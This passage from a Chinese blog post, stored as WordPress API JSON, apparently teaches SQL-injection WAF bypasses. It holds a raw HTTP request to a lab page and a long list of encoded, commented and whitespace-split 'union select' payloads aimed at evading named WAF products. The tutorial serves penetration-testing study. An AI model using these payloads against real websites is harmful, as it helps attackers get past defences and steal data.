\u53ef\u4ee5\u8f6c\u6362\u6210 u%6eion s%65lect<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-http\">POST \/06\/vul\/sqli\/sqli_id.php HTTP\/1.1\nHost: 192.168.0.165\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko\/20100101\nFirefox\/88.0\nAccept:\ntext\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,*\/*;q=0.8\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\nAccept-Encoding: gzip, deflate\nContent-Type: application\/x-www-form-urlencoded\nContent-Length: 47\nOrigin: http:\/\/192.168.0.165\nConnection: close\nReferer: http:\/\/192.168.0.165\/06\/vul\/sqli\/sqli_id.php\nCookie: PHPSESSID=hk8r159en71pndlu3jvvphenn5\nUpgrade-Insecure-Requests: 1\nid=-1 union%25OAselect%25OA1,user()-- &amp;submit=1<\/code><\/pre>\n<h2>Unicode\u7f16\u7801\u7ed5\u8fc7<\/h2>\n<p>\u5f62\u5f0f\uff1a\u201cu\u201d\u6216\u8005\u662f\u201c%u\u201d\u52a0\u4e0a 4 \u4f4d 16 \u8fdb\u5236 Unicode \u7801\u503c\u3002<\/p>\n<p>iis \u4f1a\u81ea\u52a8\u8fdb\u884c\u8bc6\u522b\u8fd9\u79cd\u7f16\u7801 \u6709\u90e8\u5206 waf \u5e76\u4e0d\u4f1a\u62e6\u622a\u8fd9\u8fd9\u79cd\u7f16\u7801<\/p>\n<p>-1 union select 1,user()<\/p>\n<p>\u90e8\u5206\u8f6c\u7801<\/p>\n<p>-1 uni%u006fn sel%u0065ct 1,user()<\/p>\n<p>\u5168\u90e8\u8f6c\u7801%u002d%u0031%u0020%u0075%u006e%u0069%u006f%u006e%u0020%u0073%u0065%u006c%u0065%u0063%u0074%u0020%u0031%u002c%u0075%u0073%u0065%u0072%u0028%u0029<\/p>\n<h2>union select\u7ed5\u8fc7<\/h2>\n<p>\u76ee\u524d\u4e0d\u5c11 waf \u90fd\u4f1a\u4f7f\u7528\u90fd\u4f1a\u5bf9 union select \u8fdb\u884c\u62e6\u622a \u5355\u4e2a\u4e0d\u62e6\u622a \u4e00\u8d77\u5c31\u8fdb\u884c\u62e6\u622a\u3002<\/p>\n<p>\u9488\u5bf9\u5355\u4e2a\u5173\u952e\u8bcd\u7ed5\u8fc7<\/p>\n<p>sel&lt;&gt;ect \u7a0b\u5e8f\u8fc7\u6ee4&lt;&gt;\u4e3a\u7a7a \u811a\u672c\u5904\u7406<\/p>\n<p>sele\/<strong>\/ct \u7a0b\u5e8f\u8fc7\u6ee4\/<\/strong>\/\u4e3a\u7a7a<\/p>\n<p>\/<em>!%53eLEct<\/em>\/ url \u7f16\u7801\u4e0e\u5185\u8054\u6ce8\u91ca<\/p>\n<p>se%0blect \u4f7f\u7528\u7a7a\u683c\u7ed5\u8fc7<\/p>\n<p>sele%ct \u4f7f\u7528\u767e\u5206\u53f7\u7ed5\u8fc7<\/p>\n<p>%53eLEct \u7f16\u7801\u7ed5\u8fc7<\/p>\n<p>\u5927\u5c0f\u5199<\/p>\n<p>uNIoN sELecT 1,2<\/p>\n<p>union all select 1,2<\/p>\n<p>union DISTINCT select 1,2<\/p>\n<p>null+UNION+SELECT+1,2<\/p>\n<p>\/<em>!union<\/em>\/\/<em>!select<\/em>\/1,2<\/p>\n<p>union\/<strong>\/select\/<\/strong>\/1,2<\/p>\n<p>and(select 1)=(Select 0xA<em>1000)\/<\/em>!uNIOn<em>\/\/<\/em>!SeLECt*\/ 1,user()<\/p>\n<p>\/<em>!50000union<\/em>\/\/<em>!50000select<\/em>\/1,2<\/p>\n<p>\/<em>!40000union<\/em>\/\/<em>!40000select<\/em>\/1,2<\/p>\n<p>%0aunion%0aselect 1,2<\/p>\n<p>%250aunion%250aselect 1,2<\/p>\n<p>%09union%09select 1,2<\/p>\n<p>%0caunion%0cselect 1,2<\/p>\n<p>%0daunion%0dselect 1,2<\/p>\n<p>%0baunion%0bselect 1,2<\/p>\n<p>%0d%0aunion%0d%0aselect 1,2<\/p>\n<p>&#8211;+%0d%0aunion&#8211;+%0d%0aselect&#8211;+%0d%0a1,&#8211;+%0d%0a2<\/p>\n<p>\/<em>!12345union<\/em>\/\/<em>!12345select<\/em>\/1,2;<\/p>\n<p>\/<em>\u4e2d\u6587<\/em>\/union\/<em>\u4e2d\u6587<\/em>\/select\/<em>\u4e2d\u6587<\/em>\/1,2;<\/p>\n<p>\/<em> <\/em>\/union\/<em> <\/em>\/select\/ *\/1,2;<\/p>\n<p>\/<em>!union<\/em>\/\/<em>!00000all<\/em>\/\/<em>!00000select<\/em>\/1,2<\/p>\n<blockquote>\n<p>\u66f4\u65b0: 2025-04-30 14:53:30<br \/>\n\u539f\u6587: <a href=\"https:\/\/www.yuque.com\/yuhui.net\/network\/mq8ato3hh4622hix\">https:\/\/www.yuque.com\/yuhui.net\/network\/mq8ato3hh4622hix<\/a><\/p>\n<\/blockquote>\n","protected":false},"excerpt":{"rendered":"<p>SQL\u6ce8\u5165\u7ed5\u8fc7 \u9632\u6ce8\u5165\u53ef\u4ee5\u4f7f\u7528\u67d0\u4e9b\u4e91 waf\u52a0\u901f\u4e50\u7b49\u5b89\u5168\u4ea7\u54c1\uff0c\u8fd9\u4e9b\u4ea7\u54c1\u4f1a\u81ea\u5e26 waf \u5c5e\u6027\u62e6\u622a\u548c\u62b5\u5fa1 SQL \u6ce8\u5165\uff0c\u4e5f\u6709\u4e00\u4e9b\u4ea7\u54c1\u4f1a\u5728\u670d\u52a1\u5668\u91cc\u5b89\u88c5\u8f6f\u4ef6\uff0c\u4f8b\u5982 iis \u5b89\u5168\u72d7\u3001d \u76fe\u3001\u8fd8\u6709\u5c31\u662f\u5728\u7a0b\u5e8f\u91cc\u5bf9\u8f93\u5165\u53c2\u6570\u8fdb\u884c\u8fc7\u6ee4\u548c\u62e6\u622a \u4f8b\u5982 360webscan \u811a\u672c\u7b49\u53ea\u8981\u53c2\u6570\u4f20\u5165\u7684\u65f6\u5019\u5c31\u4f1a\u8fdb\u884c\u68c0\u6d4b\uff0c\u68c0\u6d4b\u5230\u6709\u5371\u5bb3\u8bed\u53e5\u5c31\u4f1a\u62e6\u622a\u3002SQL \u6ce8\u5165\u7ed5\u8fc7\u7684\u6280\u672f\u4e5f\u6709\u8bb8\u591a\u3002\u4f46\u662f\u5728\u65e5\u6e10\u6210\u719f\u7684 waf \u4ea7\u54c1\u9762\u524d\uff0c\u56e0\u4e3a waf \u4ea7\u54c1 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[119,120,2],"tags":[12,22,60],"class_list":["post-770","post","type-post","status-publish","format-standard","hentry","category-shentouceshijichu-network_sec","category-loudongleibie","category-network_sec","tag-12","tag-windows","tag-shujuku"],"_links":{"self":[{"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/posts\/770","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/comments?post=770"}],"version-history":[{"count":0,"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/posts\/770\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/media?parent=770"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/categories?post=770"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/tags?post=770"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}